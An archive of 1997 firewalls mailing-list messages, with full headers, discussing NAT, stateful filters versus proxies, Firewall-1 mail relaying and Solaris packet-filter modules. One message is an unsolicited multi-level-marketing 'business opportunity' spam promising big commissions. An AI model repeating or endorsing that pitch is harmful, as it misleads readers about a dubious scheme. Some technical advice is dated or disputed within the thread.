charset=us-ascii X-Mailer: Mutt 0.66 X-Disclaimer: Things are not as they seem X-PGP-Key: http://songbird.com/kent/pgp_key.html Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Sun, Jun 08, 1997 at 03:11:43PM -0500, Vin McLellan wrote: [...] > Not classified info. As I understand it, Fortezza was originally > (1991) designed by the NSA to be a (non-RSA) public-key encryption > infrastructure for sensitive but unclassified (SUB) and confidential SBU > information. -- Kent Crispin "No reason to get excited", kent@songbird.com the thief he kindly spoke... PGP fingerprint: B1 8B 72 ED 55 21 5E 44 61 F4 58 0F 72 10 65 55 http://songbird.com/kent/pgp_key.html From owner-firewalls-outgoing Sun Jun 8 15:43:55 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id PAA28333 for firewalls-outgoing; Sun, 8 Jun 1997 15:38:24 -0700 (PDT) Received: from hitsrus.com ([205.254.167.151]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id PAA28326 for ; Sun, 8 Jun 1997 15:38:19 -0700 (PDT) From: Futurecareers@Futurecareers.com Received: from .by hitsrus.com (8.8.5/8.8.5) with SMTP id SAA17157; Sun, 8 Jun 1997 18:37:56 -0700 Message-Id: <199706090137.SAA17157@hitsrus.com> To: Futurecareers@Futurecareers.com Date: Sun, 8 Jun 97 17:38:38 -0500 Subject: Business Opportunity X-Mailer: Extractor Pro v5.0 X-Sender: Extractor Pro v5.0 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk /////////////////////////////////////////////////////////////////////////////// This Message was Composed using Extractor Pro Bulk E- Mail Software. If you wish to be removed from this advertiser's future mailings, please reply with the subject "Remove" and this software will automatically block you from their future mailings. //////////////////////////////////////////////////////////////////////////////// BUSNIESS OPPORTUNITY WOULD YOU LIKE TO OFFER PEOPLE TO SHOP AT SAM'S CLUB ONLINE?? WOULD YOU LIKE TO START YOUR OWN WORK AT HOME BUSINESS?? HAVE YOUR OWN CATALOGS FOR PEOPLE TO BUY FROM??THIS IS AN EXCELLENT WORK AT HOME OPPORTUNITY!!! FOR MORE INFORMATION EMAIL - SUCCESS02@MEGD.COM Thank you you will not regret this!!! This is going to be a big money maker!!! You earn commissions from everything you sell from your own catalogs!!! THIS IS A NEW AND EXCITING WAY TO SHOP ONLINE AND YOU WILL BE RECEIVING OUR OWN CATALOGS FOR PEOPLE TO SHOP OFFLINE ALSO. YOU EARN COMMISSIONS ON PRODUCTS EVERYONE IN YOUR DOWNLINE PURCHASES. You also get a FREE web page to market your products and to help you build your downline. REPLY TO:SUCESS02@MEGD.COM YOU WILL HAVE INFO IN SECONDS Thank You. From owner-firewalls-outgoing Sun Jun 8 17:25:35 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA05003 for firewalls-outgoing; Sun, 8 Jun 1997 17:10:49 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA04996 for ; Sun, 8 Jun 1997 17:10:43 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0was30-0004FPC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 9 Jun 1997 02:10:58 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Mon, 9 Jun 97 02:10 MET DST Received: by lina.inka.de id m0warzK-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 9 Jun 1997 02:07:10 +0200 (CEST) Message-Id: Date: Mon, 9 Jun 1997 02:07:07 +0200 From: Bernd Eckenfels To: Jamie Thain Cc: "Kelly E. Gibbs" , Ryan Russell/SYBASE , Bill Stout , firewalls Subject: Re: Stateful Packet Filters vs. Proxies References: <199706071621.JAA07513@honor.greatcircle.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <199706071621.JAA07513@honor.greatcircle.com>; from Jamie Thain on Sat, Jun 07, 1997 at 01:24:18PM -0300 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello Jamie, two things: a) describing Internet Protocolls in OSI Layers is IMHO blasphemic. and b) Yes NAT has to work on TCP Layer for rewiting stuff like FTP's PORT Command or opening UDP Data Stream Channels by TCP Control Connection PArsing (audio streams). Of course it does not need to work on (TCP/IP) Layer 3, but, if it is restricted to Layer (TCP/IP) 2 a lot of applications simply will break. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Sun Jun 8 18:25:17 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA07108 for firewalls-outgoing; Sun, 8 Jun 1997 17:44:30 -0700 (PDT) Received: from mail.ka.inka.de (quechua.inka.de [193.197.84.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id RAA07083 for ; Sun, 8 Jun 1997 17:44:19 -0700 (PDT) Received: from uu.inka.de ([193.197.84.8]) by mail.ka.inka.de with smtp (ident root using rfc1413) id m0wasZm-0004JUC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 9 Jun 1997 02:44:50 +0200 (MET DST) Received: from lina.inka.de (lists@lina.inka.de) by uu.inka.de with bsmtp (S3.1.29.1) id ; Mon, 9 Jun 97 02:44 MET DST Received: by lina.inka.de id m0wasSL-00014MC (Debian Smail-3.2 1996-Jul-4 #2); Mon, 9 Jun 1997 02:37:09 +0200 (CEST) Message-Id: Date: Mon, 9 Jun 1997 02:37:06 +0200 From: Bernd Eckenfels To: carson@lehman.com Cc: Anton J Aylward , "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship References: <3.0.32.19970604114909.00952700@the-wire.com> <199706041824.OAA19517@dragon.lehman.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.67 In-Reply-To: <199706041824.OAA19517@dragon.lehman.com>; from carson@lehman.com on Wed, Jun 04, 1997 at 02:24:02PM -0400 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Anton> One public address, and a 10.x.x.x of internal addresses and web ------------------ > Anton> servers. POW! The address space problem just went away. > > It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for > making the fwtk app proxies work with it. Next question? With one piublic address you can run only one WWW Server on Port 80. Greetings Bernd -- (OO) -- Bernd_Eckenfels@Wittumstrasse13.76646Bruchsal.de -- ( .. ) ecki@{inka.de,linux.de,debian.org} http://home.pages.de/~eckes/ o--o *plush* 2048/93600EFD eckes@irc +4972573817 BE5-RIPE (O____O) If privacy is outlawed only Outlaws have privacy From owner-firewalls-outgoing Sun Jun 8 18:27:02 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id RAA08043 for firewalls-outgoing; Sun, 8 Jun 1997 17:54:13 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id RAA08035 for firewalls@greatcircle.com; Sun, 8 Jun 1997 17:54:11 -0700 (PDT) Received: from omega.turknet.com.tr ([194.54.52.13]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id MAA04350 for ; Fri, 6 Jun 1997 12:15:37 -0700 (PDT) Received: from DESTEK_1 (DESTEK_1 [194.54.60.209]) by omega.turknet.com.tr (NTMail 3.02.13) with ESMTP id la230683 for ; Fri, 6 Jun 1997 22:21:22 +0300 From: "Hakan Abus" To: Subject: help me please ....! Date: Fri, 6 Jun 1997 22:22:34 +0300 X-MSMail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit Message-Id: <19212257112883@turknet.com.tr> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk firstly: please help me about fireball !i want to learn what it is.and frequently,i am subjected to nuke fire ...and i never escape from this.i can not use the chat securely.therefore , if you send me some acknowledge about protecting from this sabotages I will be very grateful.you can send the some ideas and file download sites`s adresses so that i can find the help useful details.because I am very interested about this issue. ps.in short,i want to be protected from nuke.thats all. Thank for your help... TURK NOKTA NET support team From owner-firewalls-outgoing Sun Jun 8 19:10:34 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id SAA18463 for firewalls-outgoing; Sun, 8 Jun 1997 18:55:41 -0700 (PDT) Received: from saturn.shcei.co.cn ([203.207.144.5]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id SAA18445 for ; Sun, 8 Jun 1997 18:55:33 -0700 (PDT) Received: from [203.207.144.133] by saturn.shcei.co.cn (AIX 4.1/UCB 5.64/4.03) id AA22162; Mon, 9 Jun 1997 09:54:10 +0900 Message-Id: <9706090054.AA22162@saturn.shcei.co.cn> From: "Cai Xuewu" To: "firewalls mailing list" Subject: NAT?? Date: Mon, 9 Jun 1997 09:56:39 -0000 X-Msmail-Priority: Normal X-Priority: 3 X-Mailer: Microsoft Internet Mail 4.70.1155 Mime-Version: 1.0 Content-Type: text/plain; charset=HZ-GB-2312 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi,firends: I heard of NAT, but its definitions and functions is not clear to me , can you tell me? ==========================|=========================== Cai Xuewu |Shanghai Information Center xwcai@saturn.shcei.co.cn | | HuaShan Road 1076 | Shanghai 200050 | P.R.C | ==========================|=========================== From owner-firewalls-outgoing Sun Jun 8 20:10:42 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id TAA24546 for firewalls-outgoing; Sun, 8 Jun 1997 19:54:22 -0700 (PDT) Received: from diablo.cisco.com (diablo.cisco.com [171.68.223.106]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id TAA24539 for ; Sun, 8 Jun 1997 19:54:17 -0700 (PDT) Received: from clonvick-pc.cisco.com (sj-dial-3-10.cisco.com [171.68.179.11]) by diablo.cisco.com (8.8.5/CISCO.SERVER.1.2) with SMTP id TAA26937; Sun, 8 Jun 1997 19:54:48 -0700 (PDT) Message-Id: <2.2.32.19970609025335.00702b60@diablo.cisco.com> X-Sender: clonvick@diablo.cisco.com X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Sun, 08 Jun 1997 21:53:35 -0500 To: "Cai Xuewu" , "firewalls mailing list" From: Chris Lonvick Subject: Re: NAT?? Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi, It's Network Address Translation and is described in RFC-1631. It's best use is to have non-NIC assigned addresses in your private network and use the NAT to translate them to NIC assigned addresses on the Internet. The address ranges that will not conflict with NIC-legal addresses on the Internet are described in RFC-1918. Hope this helps, Chris Lonvick Cisco Systems Consulting Engineering Houston, TX, USA +1.713.778.5663 At 09:56 AM 6/9/97 -0000, Cai Xuewu wrote: >Hi,firends: > > I heard of NAT, but its definitions and functions is not clear to me , can >you tell me? >==========================|=========================== >Cai Xuewu |Shanghai Information Center >xwcai@saturn.shcei.co.cn | > | >HuaShan Road 1076 | >Shanghai 200050 | >P.R.C | >==========================|=========================== > > > From owner-firewalls-outgoing Sun Jun 8 20:55:26 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id UAA26949 for firewalls-outgoing; Sun, 8 Jun 1997 20:47:47 -0700 (PDT) Received: from psyche.the-wire.com (psyche.the-wire.com [198.53.192.2]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id UAA26920 for ; Sun, 8 Jun 1997 20:47:35 -0700 (PDT) Received: from anton.the-wire.com (anton.the-wire.com [205.206.32.227]) by psyche.the-wire.com (8.8.5/8.6.12) with SMTP id XAA03377; Sun, 8 Jun 1997 23:48:03 -0400 (EDT) Message-Id: <3.0.32.19970608233222.0096f100@the-wire.com> X-Sender: anton@the-wire.com X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sun, 08 Jun 1997 23:48:22 -0400 To: Bernd Eckenfels From: Anton J Aylward Subject: Re: Plug-gw- One to many relationship Cc: firewalls@greatcircle.com Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 02:37 AM 09/06/97 +0200, you wrote: ## Reply Start ## >> Anton> One public address, and a 10.x.x.x of internal addresses and web > ------------------ >> Anton> servers. POW! The address space problem just went away. >> >> It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for >> making the fwtk app proxies work with it. Next question? > >With one public address you can run only one WWW Server on Port 80. That's just my point. Despite many people telling me the one-to-many has some magic way of extracting the data lost in the many to one mapping. Yes, I've had people tell me no information is lost is the mufti-hosts sharing one IP address. Just having NAT doesn't work that magic. This is about incoming, not outgoing, plugs. Thanks, Brend, for restoring my confidence that someone out there knows what I was talking about. >Greetings >Bernd ## Reply End ## From owner-firewalls-outgoing Sun Jun 8 21:10:28 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA28410 for firewalls-outgoing; Sun, 8 Jun 1997 21:02:23 -0700 (PDT) Received: from cih-gw.cih.com (cih-gw.cih.com [204.69.206.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA28403 for ; Sun, 8 Jun 1997 21:02:12 -0700 (PDT) Received: (from mail@localhost) by cih-gw.cih.com (8.7.6/8.6.9) id AAA17085; Mon, 9 Jun 1997 00:03:09 -0400 X-Authentication-Warning: cih-gw.cih.com: mail set sender to using -f Received: from cih-gw.cih.com(204.69.206.1) via SMTP by cih-gw.cih.com, id smtpd13662aaa; Sun Jun 8 14:05:03 1997 Date: Sun, 8 Jun 1997 10:05:02 -0400 (EDT) From: "Craig I. Hagan" Reply-To: hagan@cih.com To: Ryan Russell/SYBASE cc: "Simon J. Gerraty" , firewalls Subject: Re: Stateful Packet Filters vs. Proxies In-Reply-To: <199706080120.SAA28926@notesgw2.sybase.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > Sure, an FTP proxy that can decrypt your > encrypted FTP session will work, same as > a SPF with the same features will. > > If a SPF or a proxy can act as one endpoint > of an ancrypted connection, it can watch > for the port command and deal with it. > > You seem to be under the impression that SPFs > aren't capable of understaning the protocol > being routed... if that were the case, the non-encrypted > FTP session wouldn't work over the PIX box with NAT > emabled, would it? There is no reason that the SPF > software can't be designed to act as an encryption > endpoint, but apparantly the PIX hasn't for FTP. > I agree with you that you can make an SPF which can handle any case that a proxy can. However, it is far easier for the end user (read f/w implementor) to modify proxy code such that it will match the requirements of his/her site than it is for the end user to modify an SPF. -- craig ------------------------------------------------------------------------------- Craig I. Hagan "It's a small world, but I wouldn't want to back it up" hagan@cih.com "True hackers don't die, their ttl expires" "It takes a village to raise an idiot, but an idiot can raze a village" From owner-firewalls-outgoing Sun Jun 8 21:25:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA29438 for firewalls-outgoing; Sun, 8 Jun 1997 21:20:08 -0700 (PDT) Received: from ax-akl-fw.axon.co.nz (ax-akl-fw.axon.co.nz [202.135.112.17]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id VAA29396 for ; Sun, 8 Jun 1997 21:19:47 -0700 (PDT) Received: from ax-akl-exchcomm.axon.co.nz (ax-akl-exchcomm.axon.co.nz [128.1.2.60]) by ax-akl-fw.axon.co.nz (AIX4.2/UCB 8.7/) with SMTP id BAA20368 for ; Tue, 18 Apr 2000 01:03:15 +1300 (NZDT) Received: by ax-akl-exchcomm.axon.co.nz with SMTP (Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5) id <01BC74F1.16548730@ax-akl-exchcomm.axon.co.nz>; Mon, 9 Jun 1997 16:20:47 +1200 Message-ID: From: "Edkins, Rob - Axon AKL" To: "'martin@nii.ncb.gov.sg'" , "'Francisco Lopez (Infovia)'" Cc: "'firewalls@GreatCircle.COM'" Subject: RE: CheckPoint Firewall-1 V. 2.1 Date: Mon, 9 Jun 1997 16:22:43 +1200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.993.5 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Upgrade to version 3.0 of Firewall 1 and use the SMTP Security Server feature. This acts as an SMTP Relay, accepting the mail, then queuing it on. You could set it up in both directions, (in which case you wouldn't need address translation.) or set one up for inbound and open an SMTP filter out, with address translation as below. Big advantage of the security server is that nobody from outside touches your Exchange box directly. Yet another way would be to install the SMTP postoffice from the NT4 Server Resource kit onto your v2.1 firewall and configure this as a relay. >-----Original Message----- >From: Martin Khoo [SMTP:martin@nii.ncb.gov.sg] >Sent: Saturday, May 31, 1997 12:47 PM >To: Francisco Lopez (Infovia) >Cc: firewalls@GreatCircle.COM >Subject: Re: CheckPoint Firewall-1 V. 2.1 > >Francisco Lopez (Infovia) wrote: > >> Hello everyone... >> this is just to ask for help to someone who has made checkpoint >> firewall-1 >> ver.2.1 work efficiently with Microsoft Exchange V.5 (which is inside >> the >> protected network. When I put my Exchange server directly connected to >> >> the router it works just fine (using valid IP addresses), but after >> having >> put it back to the protected network (with invalid IP addresses) the >> firewall seems not to be handling the procedure (it drops all the mail >> >> packets -inbound and outbound-). I have opened the specific ports (25 >> and >> 110) but still it did not solve the problem. So far all the users in >> the >> protected network are just able to use their browsers but not to >> send/receive mail from internet. Does any one has had a situation like >> >> this? if so... how did you do to make it work? >> >> Francisco Lopez >> IIDS - Infovia >> Guatemala CA >> (502) 336-6236 ext. 303 > > Hi, > >A few things you need to do to get it to work : > >(1) If you intend to hide the Exchnage server in the protected n/w, then >you would need to use FW-1 >Network Address mapping to map it into a valid IP so that external mail >servers can contact it. You need to >use the FW_SRC_STATIC & FW_DST_STATIC mode of address translation. Read >the admin guide under >the chapter on Address Translation. > >Alternatively, put the Exchnage server ona DMZ and use valid IP for it. >Set up rules in the rulebase to permit >SMTP traffic (port 25) from external to it and SMTP & POP3 (port 110) >from internal to it . > >(2) MAke sure that the MX record in your DNS points to the VALID IP of >the Exchange server. > >cheers! >-- >Martin Khoo >Senior IT Architect (Security & Cryptography) >Information Infrastructure Group >National Computer Board >Email: martin@nii.ncb.gov.sg, mkhoo@ncb.gov.sg, markhoo@hotmail.com >DID: 7703878 FAX: 7747159 >PGP: 1D 5F DA E5 56 CD 6A B6 FA E0 83 55 BD 07 9C C0 > From owner-firewalls-outgoing Sun Jun 8 21:40:12 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id VAA00215 for firewalls-outgoing; Sun, 8 Jun 1997 21:25:59 -0700 (PDT) Received: from vishak.reccal.ernet.in. (vishak.reccal.ernet.in [202.41.105.25]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id VAA00136 for ; Sun, 8 Jun 1997 21:25:28 -0700 (PDT) Received: (from rajesh@localhost) by vishak.reccal.ernet.in. (8.6.12/8.6.9) id JAA12544; Mon, 9 Jun 1997 09:54:08 +0500 Date: Mon, 9 Jun 1997 09:54:08 +0500 (GMT+0500) From: FIREWALL To: firewalls@GreatCircle.COM cc: mike.jones@unifiedtech.com Subject: f/w kernel module in Solaris handling IP packets Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hi everybody, I'm Rajesh P.G. , a computer science student at Regional Engineering College - Calicut, Kerala State, India. As a classroom project, I'm implementing a 'Packet Filter Firewall'. Initially, I had worked on the idea of doing this project on one of our machines running Solaris. I realised later that,to get the firewall running will require modifications to the kernel source handling IP packets. ( I don't have Solaris kernel source code, so I switched on to Linux ). In one of the replies, Mike Jones mentioned that, FireWall-1 that works on Solaris, installs a module "which is in the path the IP packets go through ". I guess that, it'll require access to the kernel source to incorporate such modules. Could someone please tell me if there are other alternatives to install the concerned module. Thanks in advance, Rajesh P.G. Email : rajesh@vishak.reccal.ernet.in (6/6/97) ~~~~~~~~~~~~~~~ Original Message ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From: Mike Jones To: Pedro Salgueiro CC: "'Mike Jones'" , "'firewalls'" Subject: Re: PIX and Firewall-1 Pedro Salgueiro wrote: > I've been "watching" the discussion regarding the differences between packet-filtering and application level firewalls. I believe that there are some: > 1 - Packet filtering firewalls are more difficult to manage (It is very simple to mis-configure => less secure). > It may be very complicated establishing rules. I would dispute this, as least as regards FireWall-1. My experience and all the reviews I've seen agree that it's very easy to manage. Now it's certainly the case that something that's easy to configure is easy to MISconfigure, but I don't think there's a firewall in the world that can make up for an admin who doesn't know what he's doing. > 2 - Packet filter systems are always routing packets (so "fail-open" may occur). A well known contructor firewall crashed with a ping attack and routed all the packets from the insecure network to the secure one. I'd be *very* interested in knowing whose firewall that was. I also don't think this is necessarily the case. For example, FireWall-1 (which is the firewall I'm most familiar with) works on Solaris by installing a kernel module which is in the path that IP packets go through. I have a hard time seeing how it could "fail open" in that configuration, though I'd admit that it's theoretically possible. > 3 - If you are using a packet filter system and you provide SMTP, HTTP, etc. you cannot control what the users do with those protocols,i.e., you open or close a port. Application level firewalls provide secure daemons of those protocols. This is an advantage of applications level firewalls. However, there are reasons other than security (caching and spam filtering, for example) to have proxies in place, and I actually prefer an architecture where the security functions, whether proxy or filter based, are separated from the non-security functions. > Regards, > ---------- > From: Mike Jones ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From owner-firewalls-outgoing Sun Jun 8 23:32:00 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA14840 for firewalls-outgoing; Sun, 8 Jun 1997 23:20:00 -0700 (PDT) Received: from buffy.isi.net (buffy.isi.net [204.71.194.215]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA14833 for ; Sun, 8 Jun 1997 23:19:55 -0700 (PDT) Received: from localhost (mike@localhost) by buffy.isi.net (8.8.5/ISI-1.5) with SMTP id XAA20204; Sun, 8 Jun 1997 23:17:51 -0700 (PDT) Date: Sun, 8 Jun 1997 23:17:51 -0700 (PDT) From: Mike Hedlund X-Sender: mike@buffy To: FIREWALL cc: firewalls@GreatCircle.COM, mike.jones@unifiedtech.com Subject: Re: f/w kernel module in Solaris handling IP packets In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 9 Jun 1997, FIREWALL wrote: > > In one of the replies, Mike Jones mentioned that, FireWall-1 that > works on Solaris, installs a module "which is in the path the IP packets > go through ". I guess that, it'll require access to the kernel source to > incorporate such modules. Could someone please tell me if there are other > alternatives to install the concerned module. > With Solaris, you can actually 'push' a filter onto the data stream of a network interface. I suggest locating the book 'SYSV Network programming', since this subject is far to large to be contained on a mailing list. :) Or for some actual example code, go take a look at IP Filter.. if memory serves its available at ftp://coast.cs.purdue.edu/pub/tools/unix/ipf -mike From owner-firewalls-outgoing Sun Jun 8 23:40:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA12987 for firewalls-outgoing; Sun, 8 Jun 1997 23:03:04 -0700 (PDT) Received: from onshore.com (irc.onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id XAA12886 for ; Sun, 8 Jun 1997 23:02:42 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id BAA22262; Mon, 9 Jun 1997 01:03:35 -0500 Date: Mon, 9 Jun 1997 01:03:35 -0500 From: Craig Brozefsky Subject: RE: CheckPoint Firewall-1 V. 2.1 To: "Edkins, Rob - Axon AKL" cc: "'martin@nii.ncb.gov.sg'" , "'Francisco Lopez (Infovia)'" , "'firewalls@GreatCircle.COM'" In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Mon, 9 Jun 1997, Edkins, Rob - Axon AKL wrote: > Upgrade to version 3.0 of Firewall 1 and use the SMTP Security Server > feature. > > This acts as an SMTP Relay, accepting the mail, then queuing it on. Does it perform an address parsing etc...? > Big advantage of the security server is that nobody from outside touches > your Exchange box directly. Yup. > Yet another way would be to install the SMTP postoffice from the NT4 > Server Resource kit onto your v2.1 firewall and configure this as a > relay. I think that would be a really bad idea. Do not put code not specifically designed to operate ina secure environment on a firewall. NT4 postoffice is not my idea of 'secure' smtp service and I certainly would not want it running on a firewall. Craig Brozefsky craig@onshore.com onShore Inc. http://www.onshore.com/~craig Development Team p_priority=PFUN+(p_work/4)+(2*p_cash) From owner-firewalls-outgoing Mon Jun 9 00:14:32 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id XAA19085 for firewalls-outgoing; Sun, 8 Jun 1997 23:49:04 -0700 (PDT) Received: from garanti1.garanti.com.tr (garanti1.garanti.com.tr [194.54.51.100]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id XAA19021 for ; Sun, 8 Jun 1997 23:48:51 -0700 (PDT) Received: from Mailhub by garanti1.garanti.com.tr id AA11238; Mon, 9 Jun 1997 09:50:18 +0400 Received: from GarantiUser by GarantiMailServer id AA03800; Mon, 9 Jun 1997 09:49:34 +0400 Received: from [10.0.4.106] by manage1.fw.garanti.com.tr (AIX 4.1/UCB 5.64/4.03) id AA38052; Mon, 9 Jun 1997 09:47:31 +0400 Message-Id: <339C33ED.7A3A@garanti.com.tr> Date: Mon, 09 Jun 1997 09:48:45 -0700 From: Cihan Subasi Reply-To: csubasi@garanti.com.tr Organization: Garanti Ticaret X-Mailer: Mozilla 3.0Gold (Win16; I) Mime-Version: 1.0 To: Firewall Mailing List Subject: Internet Secýrity Policy... Content-Type: text/plain; charset=iso-8859-9 Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I need to create an Internet & Security policy for the company,if anybody can send me a copy of their policy or tell me where I can find such a thing so I can take a look at it,it will be great.... Thanks, -- *************************************************************** Cihan Subasi Garanti Ticaret, Istanbul Turkey email= cihans@garanti.com.tr or csubasi@garanti.com.tr Phone= +902126570404 Fax = +902126570473 *************************************************************** From owner-firewalls-outgoing Mon Jun 9 03:25:21 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id DAA10497 for firewalls-outgoing; Mon, 9 Jun 1997 03:18:21 -0700 (PDT) Received: from h01.scientia.com (h01.scientia.com [194.216.183.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id DAA10487 for ; Mon, 9 Jun 1997 03:17:58 -0700 (PDT) Received: by h01.scientia.com with SMTP id LAA04284 for ; Mon, 9 Jun 1997 11:18:27 +0100 Message-Id: <199706091018.LAA04284@h01.scientia.com> X-Sender: firewall@pop-server X-Mailer: Windows Eudora Light Version 1.5.2 Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Mon, 09 Jun 1997 11:17:41 +0100 To: From: Ian Miller Subject: Re: nt web server log Sender: firewalls-owner@GreatCircle.COM Precedence: bulk At 15:44 06/06/97 -0500, Peter da Silva wrote: >The really annoying thing was that these sites were returning pages at >my home box INSTEAD of the more recently updated ones online! > >The thing is, if a webcrawler is returning pages that have been sending >a 404 for 7 months, how much can it be trusted? > I think I can see how this can happen, and it is a good example of the importance of appropriate robots.txt files. Some sites to ensure maximum hits have various mechanisms to prevent caching like inventing dynamic names for every link in every page. This means that any robot thinks it has found an infinite sized site as it never gets the same URL twice. (An appropriate robots.txt file should limit robots to the static URLs only.) It just needs one site like that includes an out-of-date link to your site and the robot will keep encountering references to your site. As most robots won't keep records of 404ed pages, they will keep coming back. It would be worth while logging the "referring site" for all of these hits and then contact the webmaster(s) suggesting: 1) They installs an appropriate robots.txt 2) They corrects the links to your site. Ian From owner-firewalls-outgoing Mon Jun 9 04:55:42 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id EAA16245 for firewalls-outgoing; Mon, 9 Jun 1997 04:50:30 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA16237 for ; Mon, 9 Jun 1997 04:50:23 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.8.5/8.6.9) id HAA25241; Mon, 9 Jun 1997 07:48:00 -0400 (EDT) From: Adam Shostack Message-Id: <199706091148.HAA25241@homeport.org> Subject: Re: Restrict Springboarding In-Reply-To: <199706081622.JAA00162@notesgw2.sybase.com> from Ryan Russell/SYBASE at "Jun 8, 97 09:28:13 am" To: Ryan.Russell@sybase.com (Ryan Russell/SYBASE) Date: Mon, 9 Jun 1997 07:48:00 -0400 (EDT) Cc: khanhi@emirates.com, Firewalls@GreatCircle.COM X-Mailer: ELM [version 2.4ME+ PL27 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Your third choice (if management will back you) is to contract that they won't bounce, use a tty sniffer* to watch their actions, and then recover damages if they hop on. You might also use some form of process accounting to see what programs they invoke, and challenge 